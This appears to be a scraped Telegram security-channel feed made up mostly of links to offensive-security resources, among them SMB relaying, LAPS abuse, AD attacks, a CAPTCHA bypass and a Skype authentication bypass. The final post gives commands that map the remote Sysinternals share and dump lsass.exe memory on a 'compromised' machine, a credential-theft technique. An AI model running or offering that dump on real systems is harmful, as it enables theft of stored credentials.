EUD Security Guidance: Windows 10 - 1803
https://www.ncsc.gov.uk/guidance/eud-security-guidance-windows-10-1803
https://www.ncsc.gov.uk/guidance/eud-security-guidance-windows-10-1803
ss7MAPer – A SS7 pen testing toolkit
https://insinuator.net/2016/02/ss7maper-a-ss7-pen-testing-toolkit/
https://insinuator.net/2016/02/ss7maper-a-ss7-pen-testing-toolkit/
Forwarded from امنیت اطلاعات
This media is not supported in your browser
VIEW IN TELEGRAM
Here’s wishing you all the joy of the season. Have a Happy New Year!
تیم امنیت اطلاعات سال میلادی سرشار از موفقیت و امنیت را برای شما همراهان آرزو میکند.
@sec_nerd
تیم امنیت اطلاعات سال میلادی سرشار از موفقیت و امنیت را برای شما همراهان آرزو میکند.
@sec_nerd
unCaptcha2:-
defeating the latest version of ReCaptcha with 91% accuracy.
Demo:
https://user-images.githubusercontent.com/14065974/45004579-df021180-afbb-11e8-8598-177159ed09b4.gif
https://github.com/ecthros/uncaptcha2
defeating the latest version of ReCaptcha with 91% accuracy.
Demo:
https://user-images.githubusercontent.com/14065974/45004579-df021180-afbb-11e8-8598-177159ed09b4.gif
https://github.com/ecthros/uncaptcha2
windowsblindread
A list of files / paths to probe when arbitrary files can be read on a Microsoft Windows operating system
https://github.com/soffensive/windowsblindread
A list of files / paths to probe when arbitrary files can be read on a Microsoft Windows operating system
https://github.com/soffensive/windowsblindread
GitHub
GitHub - soffensive/windowsblindread: A list of files / paths to probe when arbitrary files can be read on a Microsoft Windows…
A list of files / paths to probe when arbitrary files can be read on a Microsoft Windows operating system - soffensive/windowsblindread
Malicious use of Microsoft LAPS
https://akijosberryblog.wordpress.com/2019/01/01/malicious-use-of-microsoft-laps/
https://akijosberryblog.wordpress.com/2019/01/01/malicious-use-of-microsoft-laps/
Akijosberry
Malicious use of Microsoft LAPS
LAPS Overview: LAPS (Local Administrator Password Solution) is a tool for managing local administrator passwords for domain joined computers. It stores passwords/secrets in a confidential attribute…
Effective NTLM / SMB Relaying
https://room362.com/post/2014/2014-05-21-effective-ntlm-slash-smb-relaying/
https://room362.com/post/2014/2014-05-21-effective-ntlm-slash-smb-relaying/
Room362
Effective NTLM / SMB Relaying · Rob 'mubix' Fuller
SMB Relay has been around for a long while. I even have a post about using it along with LNK files here:
MS08-068 + MS10-046 = Fun until 2018
Here is the problem though. Most of the tools to exploit it either catch the authentication in NTLMv2/NTLMv1 (which…
MS08-068 + MS10-046 = Fun until 2018
Here is the problem though. Most of the tools to exploit it either catch the authentication in NTLMv2/NTLMv1 (which…
Fun with LDAP, Kerberos (and MSRPC) in AD Environments
https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments
https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments
Speaker Deck
Fun with LDAP, Kerberos (and MSRPC) in AD Environments
Slides from my Track X Thotcon 2018 Workshop entitled:
"Fun with LDAP, Kerberos (and MSRPC) in AD Environments"
If you want the embedded Gifs/Vide…
"Fun with LDAP, Kerberos (and MSRPC) in AD Environments"
If you want the embedded Gifs/Vide…
Interesting vuln allows attacker to bypass auth for android phone by taking a Skype call ☎️ 🔓
https://youtu.be/EiEcwOfTFqI
https://youtu.be/EiEcwOfTFqI
YouTube
Skype Android Authentication Bypass
Skype Android Authentication Bypass
Florian Kunushevci
https://www.linkedin.com/in/floriankunushevci/
https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-0622
Florian Kunushevci
https://www.linkedin.com/in/floriankunushevci/
https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-0622
Map #Sysinternals tools folder locally, run tools when required. Useful on a compromised remote machine to avoid tool clutter.
net use Z: \\http://live.sysinternals.com \tools\ "/user:"
dir Z:
Z:\procdump -accepteula -ma lsass.exe lsassdmp
net use Z: \\http://live.sysinternals.com \tools\ "/user:"
dir Z:
Z:\procdump -accepteula -ma lsass.exe lsassdmp